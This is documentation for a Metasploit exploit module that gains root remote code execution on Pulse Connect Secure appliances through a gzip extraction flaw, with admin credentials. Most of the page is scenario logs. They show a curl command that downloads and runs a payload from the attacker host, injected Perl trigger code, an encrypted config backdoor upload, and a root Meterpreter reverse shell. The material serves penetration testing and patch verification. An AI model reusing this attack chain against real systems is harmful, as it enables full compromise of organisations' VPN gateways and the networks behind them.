h00die
5.8 KiB
5.8 KiB
Vulnerable Application
The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability which allows an authenticated attacker to overwrite arbitrary files, resulting in Remote Code Execution as root. Admin credentials are required for successful exploitation.
NCC Group wrote in their findings a few different ways to achieve RCE through the gzip vulnerability. This exploit utilizes the Template Toolkit method which works up to 9.1R8 (possibly more), whereas the other methods were patched earlier. With this method, since the payload is sent in the perl template, there are also no bad characters.
Of note, MANY binaries are not in $PATH, but are located in /home/bin/. Thanks to @wvu for pointing that out.
Pulse Secure Connect trial can be downloaded here.
Verification Steps
- Install the server
- Start msfconsole
- Do:
use exploit/linux/http/pulse_secure_gzip_rce - Do:
set rhosts [IP] - Do:
set ssl true - Do:
set username [username] - Do:
set password [password] - Do:
run - You should get a root shell
Options
cmd
If this option is set, a single command will be run instead of the payload. Defaults to `` (empty)
Scenarios
Pulse Connect Secure 9.1R8 build 7453, Meterpreter Payload
[*] Processing pulse.rb for ERB directives.
resource (pulse.rb)> use exploit/linux/http/pulse_secure_gzip_rce
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (pulse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (pulse.rb)> set rport 443
rport => 443
resource (pulse.rb)> set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
resource (pulse.rb)> set username pulse
username => pulse
resource (pulse.rb)> set password pulsepulse
password => pulsepulse
resource (pulse.rb)> set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
resource (pulse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (pulse.rb)> set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf6 exploit(linux/http/pulse_secure_gzip_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Exploiting...
[*] Using URL: http://1.1.1.1:8080/X8ZY2uaHuTrbj9
[*] 2.2.2.2 - Attempting login to: https://2.2.2.2:443/dana-na/auth/url_admin/login.cgi
[*] 2.2.2.2 - Finding Version
[*] 2.2.2.2 - Version 9.1, revision 8, build 7453 found
[*] 2.2.2.2 - Version is vulnerable
[*] 2.2.2.2 - Exploit trigger will be at https://2.2.2.2:443/dana-na/auth/setcookie.cgi with a header of OPUYNYOI
[*] 2.2.2.2 - curl -so /tmp/xScfkrKh http://1.1.1.1:8080/X8ZY2uaHuTrbj9;chmod +x /tmp/xScfkrKh;/tmp/xScfkrKh;rm -f /tmp/xScfkrKh
[*] 2.2.2.2 - Perl code being injected
if( length $ENV{HTTP_OPUYNYOI}){
system("/home/bin/curl -so /tmp/xScfkrKh http://1.1.1.1:8080/X8ZY2uaHuTrbj9");
chmod 0777, "/tmp/xScfkrKh";
system("env /tmp/xScfkrKh");
}
[*] 2.2.2.2 - Encrypting config with exploit backdoor
[*] 2.2.2.2 - [*] Key: 7e95421a6b886641431b32c52442e2e483f81f58b0e9e9a5
[*] 2.2.2.2 - [*] IV: df14482b2b3f9e24
[*] 2.2.2.2 - [+] Encrypted header: 8ae8e163
[*] 2.2.2.2 - [*] Digest: 5e457443190f0015e0949bdd19bbae0d
[*] 2.2.2.2 - [*] Hash: cb269d28ab81904636fac81d57ecdd37
[*] 2.2.2.2 - Requesting backup config page
[*] 2.2.2.2 - Uploading encrypted config backup
[*] 2.2.2.2 - Triggering RCE
[*] Client 2.2.2.2 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3) requested /X8ZY2uaHuTrbj9
[*] Sending payload to 2.2.2.2 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3)
[*] Sending stage (976712 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:30418) at 2020-11-08 22:15:58 -0500
[*] 2.2.2.2 - Request timed out, most likely due to obtaining a session!
[*] 2.2.2.2 - Logging out to prevent warnings to other admins
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: root @ localhost2 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : 2.2.2.2
OS : (Linux 2.6.32-00025-g841d072-dirty)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
Pulse Connect Secure 9.1R8 build 7453, cmd Execution
msf6 exploit(linux/http/pulse_secure_gzip_rce) > set cmd 'uname -a'
cmd => uname -a
msf6 exploit(linux/http/pulse_secure_gzip_rce) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Exploiting...
[*] Using URL: http://1.1.1.1:8080/9fy9OzRRf7zJo4c
[*] 2.2.2.2 - Attempting login to: https://2.2.2.2:443/dana-na/auth/url_admin/login.cgi
[*] 2.2.2.2 - Finding Version
[*] 2.2.2.2 - Version 9.1, revision 8, build 7453 found
[*] 2.2.2.2 - Version is vulnerable
[*] 2.2.2.2 - Exploit trigger will be at https://2.2.2.2:443/dana-na/auth/setcookie.cgi with a header of YHAVWSXI
[*] 2.2.2.2 - Perl code being injected
if( length $ENV{HTTP_YHAVWSXI}){
system("uname -a");
}
[*] 2.2.2.2 - Encrypting config with exploit backdoor
[*] 2.2.2.2 - [*] Key: 7e95421a6b886641431b32c52442e2e483f81f58b0e9e9a5
[*] 2.2.2.2 - [*] IV: ab94ad78a3897ab8
[*] 2.2.2.2 - [+] Encrypted header: 37fffeb3
[*] 2.2.2.2 - [*] Digest: 42a0340dfb408186f7d3ce177218fa18
[*] 2.2.2.2 - [*] Hash: 6ad4c2b6b800c4c9db1e2c345d4a9e8c
[*] 2.2.2.2 - Requesting backup config page
[*] 2.2.2.2 - Uploading encrypted config backup
[*] 2.2.2.2 - Triggering RCE
[*] 2.2.2.2 - Command Output:
Linux localhost2 2.6.32-00025-g841d072-dirty #1 SMP Mon Jul 20 17:51:26 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[*] 2.2.2.2 - Logging out to prevent warnings to other admins
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.